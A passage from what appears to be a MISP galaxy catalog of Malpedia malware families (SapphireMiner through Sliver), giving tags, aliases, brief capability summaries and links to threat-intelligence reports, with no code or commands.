https://sites.temple.edu/care/ci-rw-attacks/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://news.sophos.com/en-us/2018/07/31/samsam-guide-to-coverage/

https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit

https://www.secureworks.com/blog/samas-ransomware

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/

SapphireMiner

The tag is: misp-galaxy:malpedia="SapphireMiner"

SapphireMiner is also known as:

Table 4512. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sapphire_miner

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

SapphireStealer

The tag is: misp-galaxy:malpedia="SapphireStealer"

SapphireStealer is also known as:

Table 4513. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sapphire_stealer

https://github.com/0day2/SapphireStealer/

Satacom

The tag is: misp-galaxy:malpedia="Satacom"

Satacom is also known as:

  • LegionLoader

Table 4517. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.satacom

https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/

Satana

According to bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computer’s master boot record (MBR) and prevents it from starting.

The tag is: misp-galaxy:malpedia="Satana"

Satana is also known as:

Table 4519. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.satana

https://blog.reversinglabs.com/blog/retread-ransomware

https://www.cylance.com/threat-spotlight-satan-raas

Scarabey

Ransomware with ransomnote in Russian and encryption extension .scarab.

The tag is: misp-galaxy:malpedia="Scarabey"

Scarabey is also known as:

  • MVP

  • Scarab

  • Scarab-Russian

Table 4523. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey

https://id-ransomware.blogspot.com/2017/12/scarabey-ransomware.html

ScareCrow

Based on the leaked Conti source code.

The tag is: misp-galaxy:malpedia="ScareCrow"

ScareCrow is also known as:

Table 4525. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.scarecrow

https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants

Schneiken

Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.

The tag is: misp-galaxy:malpedia="Schneiken"

Schneiken is also known as:

Table 4526. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken

https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb

https://github.com/vithakur/schneiken

Scout

A downloader that uses Windows messages to control its execution flow.

The tag is: misp-galaxy:malpedia="Scout"

Scout is also known as:

Table 4529. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.scout

https://asec.ahnlab.com/en/57685/

ScreenCap

SentinelOne describes this malware as capable of doing screen capture and keylogging. It is uses by a threat cluster they named WIP19, targeting telecommunications and IT service providers in the Middle East and Asia.

The tag is: misp-galaxy:malpedia="ScreenCap"

ScreenCap is also known as:

Table 4531. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.screencap

https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/

ScreenLocker

The tag is: misp-galaxy:malpedia="ScreenLocker"

ScreenLocker is also known as:

Table 4532. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker

https://twitter.com/struppigel/status/791535679905927168

SDBbot

The tag is: misp-galaxy:malpedia="SDBbot"

SDBbot is also known as:

Table 4534. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104

https://github.com/Tera0017/SDBbot-Unpacker

https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://vblocalhost.com/uploads/VB2020-Jung.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector

https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824

https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://intel471.com/blog/a-brief-history-of-ta505

Seduploader

simple tool to facilitate download and persistence of a next-stage tool; collects system information and metadata probably in an attempt to tell sandbox-environments apart from real targets on the server-side; uses domains of search engines like Google to check for Internet connectivity; XOR-based string obfuscation with a 16-byte key

The tag is: misp-galaxy:malpedia="Seduploader"

Seduploader is also known as:

  • GAMEFISH

  • carberplike

  • downrage

  • jhuhugit

  • jkeyskw

Table 4540. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader

https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/

https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf

http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html

https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/

https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/

https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/

https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government

https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

https://blog.xpnsec.com/apt28-hospitality-malware-part-2/

http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/

http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/

https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html

https://www.secureworks.com/research/threat-profiles/iron-twilight

https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf

https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed

seinup

The tag is: misp-galaxy:malpedia="seinup"

seinup is also known as:

Table 4541. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.seinup

https://www.fireeye.com/blog/threat-research/2013/06/trojan-apt-seinup-hitting-asean.html

SepSys

Ransomware.

The tag is: misp-galaxy:malpedia="SepSys"

SepSys is also known as:

  • Silvertor Ransomware

Table 4545. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys

https://id-ransomware.blogspot.com/2020/02/sepsys-ransomware.html

SerialVlogger

This malware is protected using VMProtect and related to the loading of KEYPLUG.

The tag is: misp-galaxy:malpedia="SerialVlogger"

SerialVlogger is also known as:

Table 4547. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.serialvlogger

https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf

Serpent Stealer

The tag is: misp-galaxy:malpedia="Serpent Stealer"

Serpent Stealer is also known as:

Table 4548. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.serpent

https://labs.k7computing.com/index.php/uncovering-the-serpent/

Serpico

The tag is: misp-galaxy:malpedia="Serpico"

Serpico is also known as:

Table 4549. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico

ServHelper

ServHelper is written in Delphi and according to ProofPoint best classified as a backdoor.

ProofPoint noticed two distinct variant - "tunnel" and "downloader" (citation): "The 'tunnel' variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to 'hijack' legitimate user accounts or their web browser profiles and use them as they see fit. The 'downloader' variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader."

The tag is: misp-galaxy:malpedia="ServHelper"

ServHelper is also known as:

Table 4550. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/

https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/

https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html

https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners

https://insights.oem.avira.com/ta505-apt-group-targets-americas/

https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf

https://prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf

https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/

https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf

https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware

https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/

https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/

https://intel471.com/blog/a-brief-history-of-ta505

SessionManager

A malicious IIS module that allows up/download of files, remote command execution, and using the compromised server as a hop into the network behind.

The tag is: misp-galaxy:malpedia="SessionManager"

SessionManager is also known as:

Table 4551. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.session_manager

https://securelist.com/the-sessionmanager-iis-backdoor/106868/

ShadowPad

The tag is: misp-galaxy:malpedia="ShadowPad"

ShadowPad is also known as:

  • POISONPLUG.SHADOW

  • XShellGhost

Table 4554. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad

https://medium.com/insomniacs/its-a-bee-it-s-a-no-it-s-shadowpad-aff6a970a1c2

https://therecord.media/redecho-group-parks-domains-after-public-exposure/

https://www.youtube.com/watch?v=IRh6R8o1Q7U

https://attack.mitre.org/groups/G0096

https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021

https://www.youtube.com/watch?v=55kaaMGBARM

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/critical-infrastructure-attacks

https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/

https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/

https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/

https://www.theregister.com/2022/04/08/china_sponsored_attacks_india_ukraine/

https://research.nccgroup.com/2022/09/30/a-glimpse-into-the-shadowy-realm-of-a-chinese-apt-detailed-analysis-of-a-shadowpad-intrusion/

https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html

https://thehackernews.com/2022/02/researchers-link-shadowpad-malware.html

https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns

https://community.riskiq.com/article/d8b749f2

https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/

https://www.ic3.gov/Media/News/2021/211220.pdf

https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html

https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf

https://securelist.com/shadowpad-in-corporate-networks/81432/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf

https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf

https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf

https://www.recordedfuture.com/redecho-targeting-indian-power-sector/

https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf

https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/

https://www.youtube.com/watch?v=r1zAVX_HnJg

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf

https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html

https://www.welivesecurity.com/2022/09/06/worok-big-picture/

https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf

https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf

https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf

https://www.youtube.com/watch?v=_fstHQSK-kk

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/

https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf

https://securelist.com/apt-trends-report-q2-2020/97937/

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/

https://securelist.com/apt-trends-report-q3-2020/99204/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor

https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf

https://www.secureworks.com/research/shadowpad-malware-analysis

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf

shareip

The tag is: misp-galaxy:malpedia="shareip"

shareip is also known as:

  • remotecmd

Table 4557. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip

https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

SharpBeacon

NET reimplementation of Cobalt Strike beacon/stager

The tag is: misp-galaxy:malpedia="SharpBeacon"

SharpBeacon is also known as:

Table 4559. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpbeacon

https://github.com/mai1zhi2/SharpBeacon

SharpMapExec

This tool is made to simplify penetration testing of networks and to create a Swiss-army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.

The tag is: misp-galaxy:malpedia="SharpMapExec"

SharpMapExec is also known as:

Table 4561. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpmapexec

https://github.com/cube0x0/SharpMapExec

SharpStage

The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called “Stage_One”. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east.

The tag is: misp-galaxy:malpedia="SharpStage"

SharpStage is also known as:

  • LastConn

Table 4562. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage

https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign

SHARPSTATS

The tag is: misp-galaxy:malpedia="SHARPSTATS"

SHARPSTATS is also known as:

Table 4563. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstats

https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf

ShellLocker

PCRIsk states that ShellLocker is a ransomware-type virus developed using .NET framework. It was first discovered by Jakub Kroustek and is virtually identical to another ransomware virus called Exotic.

Following infiltration, this virus encrypts stored data (video, audio, etc.) and renames encrypted files using the "[random_characters].L0cked" pattern (e.g., "sample.jpg" might be renamed to "gd&=AA0fgoi.L0cked"). Following successful encryption, ShellLocker opens a pop-up window containing ransom-demand message.

The tag is: misp-galaxy:malpedia="ShellLocker"

ShellLocker is also known as:

Table 4565. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker

https://twitter.com/JaromirHorejsi/status/813726714228604928

SHIPSHAPE

SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.

The tag is: misp-galaxy:malpedia="SHIPSHAPE"

SHIPSHAPE is also known as:

Table 4568. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape

https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

SideWalk (Windows)

Shellcode-based malware family that according to ESET Research was likely written by the same authors as win.crosswalk.

The tag is: misp-galaxy:malpedia="SideWalk (Windows)"

SideWalk (Windows) is also known as:

  • ScrambleCross

Table 4573. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk

https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware

https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf

Siggen6

The tag is: misp-galaxy:malpedia="Siggen6"

Siggen6 is also known as:

Table 4579. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6

SigLoader

The tag is: misp-galaxy:malpedia="SigLoader"

SigLoader is also known as:

Table 4580. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sigloader

https://www.lac.co.jp/lacwatch/report/20201201_002363.html

sihost

The tag is: misp-galaxy:malpedia="sihost"

sihost is also known as:

Table 4581. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sihost

https://threatrecon.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists/

Silence

According to PCrisk, Truebot, also known as Silence.Downloader, is a malicious program that has botnet and loader/injector capabilities. This malware can add victims' devices to a botnet and cause chain system infections (i.e., download/install additional malicious programs/components).

There is significant variation in Truebot’s infection chains and distribution. It is likely that the attackers using this malicious software will continue to make such changes.

The tag is: misp-galaxy:malpedia="Silence"

Silence is also known as:

  • TrueBot

Table 4582. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.silence

https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html

https://github.com/Tera0017/TAFOF-Unpacker

https://www.youtube.com/watch?v=FttiysUZmDw

https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits

http://www.intezer.com/silenceofthemoles/

https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/

https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://malware.love/malware_analysis/reverse_engineering/config_extraction/2023/07/13/truebot-config-extractor.html

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a

https://norfolkinfosec.com/some-notes-on-the-silence-proxy/

https://securityintelligence.com/posts/x-force-prevents-zero-day-from-going-anywhere

https://malware.love/malware_analysis/reverse_engineering/2023/02/12/analyzing-truebot-packer.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.group-ib.com/resources/threat-research/silence.html

https://securelist.com/the-silence/83009/

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/

https://malware.love/malware_analysis/reverse_engineering/2023/02/18/analyzing-truebot-static-unpacking.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf

https://reaqta.com/2019/01/silence-group-targeting-russian-banks/

https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf

https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/

SILENTUPLOADER

According to Mandiant, SILENTUPLOADER is an uploader written in MSIL that is dropped by DOSTEALER and is designed to work specifically in tandem with it. It checks for files in a specified folder every 30 seconds and uploads them to a remote server.

The tag is: misp-galaxy:malpedia="SILENTUPLOADER"

SILENTUPLOADER is also known as:

Table 4583. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.silentuploader

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

Siluhdur

The tag is: misp-galaxy:malpedia="Siluhdur"

Siluhdur is also known as:

Table 4585. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur

SimpleFileMover

The tag is: misp-galaxy:malpedia="SimpleFileMover"

SimpleFileMover is also known as:

Table 4587. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover

https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

skip-2.0

A Microsoft SQL Server backdoor

The tag is: misp-galaxy:malpedia="skip-2.0"

skip-2.0 is also known as:

Table 4592. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20

https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/

Skyplex

The tag is: misp-galaxy:malpedia="Skyplex"

Skyplex is also known as:

Table 4594. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex

Slam

Ransomware.

The tag is: misp-galaxy:malpedia="Slam"

Slam is also known as:

Table 4595. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slam

https://www.sentinelone.com/blog/from-the-front-lines-slam-anatomy-of-a-publicly-available-ransomware-builder/

Slave

The tag is: misp-galaxy:malpedia="Slave"

Slave is also known as:

Table 4596. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slave

https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/

Slingshot

  • 2012 first sighted

  • Attack vector via compromised Mikrotik routers where victims get infection when they connect to Mikrotik router admin software - Winbox

  • 2018 when discovered by Kaspersky Team

Infection Vector - Infected Mikrotik Router > Malicious DLL (IP4.dll) in Router > User connect via winbox > Malicious DLL downloaded on computer

The tag is: misp-galaxy:malpedia="Slingshot"

Slingshot is also known as:

Table 4598. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot

https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf

https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/

https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/

https://securelist.com/apt-slingshot/84312/

Sliver

According to VK9 Seecurity, Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.

The tag is: misp-galaxy:malpedia="Sliver"

Sliver is also known as:

Table 4599. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver

https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike

https://team-cymru.com/blog/2022/04/29/sliver-case-study-assessing-common-offensive-security-tools/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://www.telsy.com/download/5900/?uid=b797afdcfb

https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx

https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf

https://embee-research.ghost.io/shodan-censys-queries/

https://github.com/chronicle/GCTI

https://www.team-cymru.com/post/sliver-case-study-assessing-common-offensive-security-tools

https://asec.ahnlab.com/en/56941/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks

https://asec.ahnlab.com/en/47088/

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://www.immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/

https://github.com/BishopFox/sliver

https://asec.ahnlab.com/en/55652/

slnrat

The tag is: misp-galaxy:malpedia="slnrat"

slnrat is also known as:

Table 4600. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slnrat

https://asec.ahnlab.com/ko/37764/

SlothfulMedia

